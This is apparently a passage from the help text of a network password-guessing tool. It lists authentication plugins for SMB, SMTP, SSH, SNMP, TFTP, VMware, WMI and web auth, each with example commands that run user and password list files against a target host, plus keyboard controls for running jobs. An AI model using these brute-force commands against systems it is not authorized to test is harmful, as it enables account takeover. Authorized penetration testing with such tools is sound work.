Description:  SMB plugin (NTLM2 lm=5 compatible with 0,1,2,3,4 and 5, supposedly!)
Extra params: Domain, e.g. companyx
Examples:     -r=smbapintlmv2 -U=c:\users.txt -P=c:\passes.txt -h=10.0.0.1 -t=1

Name:         smtplogin
Description:  SMTP login auth plugin [login is an authentication type like NTLM]
Extra params: Fully qualified domain, e.g. example.com (NOT REQUIRED BUT MAY BE USEFUL)
Examples:

Name:         smtpcram
Description:  SMTP CRAM-MD5 auth plugin
Extra params: Fully qualified domain, e.g. example.com (NOT REQUIRED BUT MAY BE USEFUL)
Examples:

Name:         smtpntlm
Description:  SMTP NTLM auth plugin
Extra params: Fully qualified domain, e.g. example.com (NOT REQUIRED BUT MAY BE USEFUL)
Examples:

Name:         smtpntlmbasic
Description:  SMTP NTLM/Basic auth plugin [w2k]
Extra params: None
Examples:

Name:         snmp
Description:  SNMP plugin
Extra params: None
Examples:     -r=snmp -P=c:\passes.txt -h=10.0.0.1 -d -t=16

Name:         ssh
Description:  SSH auth plugin
Extra params: None
Examples:     -r=ssh -u=root -P=c:\passes.txt -h=10.0.0.1 -t=10

Name:         sshalt
Description:  SSH alternate auth plugin, multiple auths/connect - slighly faster for one user
Extra params: None
Examples:     -r=sshalt -u=root -P=c:\passes.txt -h=10.0.0.1 -t=10

Name:         tcpfuzzerrandom
Description:  TCP Fuzzer Random plugin
Extra params: Max data length
Examples:     -r=tcpfuzzerrandom -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         tkpt
Description:  TKPT plugin
Extra params: None
Examples:     -r=tkpt -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         tkptrandom
Description:  TKPT random data plugin
Extra params: None
Examples:     -r=tkptrandom -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         tftp
Description:  TFTP plugin
Extra params: Optional path prefix, e.g. /etc/  (tip: watch windows firewall)
Examples:     -r=tftp -P=c:\unix_just_files.txt -h=10.0.0.1 -t=16

Name:         udpfuzzerrandom
Description:  UDP Fuzzer Random plugin
Extra params: Max data length
Examples:     -r=udpfuzzerrandom -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         vmware
Description:  VMware ESX/VC plugin
Extra params: None
Examples:     -r=vmware -u=root -P=c:\passes.txt -h=10.0.0.1 -s -t=4

Name:         vnc
Description:  VNC plugin
Extra params: None
Examples:

Name:         wmi
Description:  WMI plugin
Extra params: The wmi end point, defaults to \ROOT\CIMV2
Examples:     -r=wmi -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         wwwbasic
Description:  WWW basic auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwbasic -U c:\users.txt -P c:\passes.txt -h http://10.0.0.1:8080 -e windowsdomain

Name:         wwwdigest
Description:  WWW digest auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwdigest -U c:\users.txt -P c:\passes.txt -h http://10.0.0.1:8080 -e windomain

Name:         wwwntlm
Description:  WWW NTLM auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwntlm -U c:\users.txt -P c:\passes.txt -h http://10.0.0.1:8080 -e awindomain

Name:         wwwntlmv2
Description:  WWW NTLMv2 auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwntlmv2 -h 10.9.9.1 -u administrator -p blah -e win2k3r2domain -t 8

  Keys during tasks
        v to increase debug level
        b to decrease debug level
        + to increase active threads
        - to decrease active threads
        p to pause/resume current job
        s to show authentication successes so far
        d to delete an IP address from the list
        F12 to save current progress, resume with parameter -R.
        Control + c to quit nicely (hold down to force!)